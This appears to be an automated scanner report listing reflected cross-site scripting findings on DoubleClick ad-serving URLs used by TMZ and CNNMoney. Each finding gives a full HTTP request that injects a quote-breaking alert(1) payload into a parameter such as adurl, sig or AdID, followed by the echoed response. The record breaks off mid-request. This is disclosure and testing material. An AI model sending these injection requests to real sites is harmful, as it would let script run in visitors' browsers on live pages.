Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:03:58 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:03:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/f/17c/%2a/e%3B238208793%3B0-0%3B0%3B61271527%3B3454-728/90%3B41152703/41170490/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l48c1c"-alert(1)-"6255ab16084&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18602"-alert(1)-"78977e6fbdc was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=18602"-alert(1)-"78977e6fbdc HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6880
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 22:06:27 GMT
Expires: Tue, 22 Mar 2011 22:06:27 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=18602"-alert(1)-"78977e6fbdchttp://learning.capella.edu/banners.aspx?revkey=151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec400"-alert(1)-"326249badcd was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACEec400"-alert(1)-"326249badcd&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:05:53 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:05:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
JTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACEec400"-alert(1)-"326249badcd&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd738"-alert(1)-"12e78c94558 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590fd738"-alert(1)-"12e78c94558&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:06:24 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:06:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590fd738"-alert(1)-"12e78c94558&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8cf5"-alert(1)-"b71604affcc was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1d8cf5"-alert(1)-"b71604affcc&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:06:04 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:06:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
IPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1d8cf5"-alert(1)-"b71604affcc&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42fe9"-alert(1)-"56fa64cb305 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA42fe9"-alert(1)-"56fa64cb305&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:06:14 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:06:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA42fe9"-alert(1)-"56fa64cb305&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ff4"-alert(1)-"f2e94a5331d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l67ff4"-alert(1)-"f2e94a5331d&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:05:43 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:05:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/f/170/%2a/c%3B236509780%3B5-0%3B0%3B41471909%3B4307-300/250%3B40692218/40710005/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l67ff4"-alert(1)-"f2e94a5331d&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHo
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f363"-alert(1)-"4bc1b0ca98c was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=4852423f363"-alert(1)-"4bc1b0ca98c&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:40:52 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:40:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7584

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
oubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/g%3B234201586%3B1-0%3B0%3B58104650%3B4307-300/250%3B37901085/37918903/3%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=4852423f363"-alert(1)-"4bc1b0ca98c&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ce9"-alert(1)-"4b1d0a00e01 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=35312197ce9"-alert(1)-"4b1d0a00e01&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
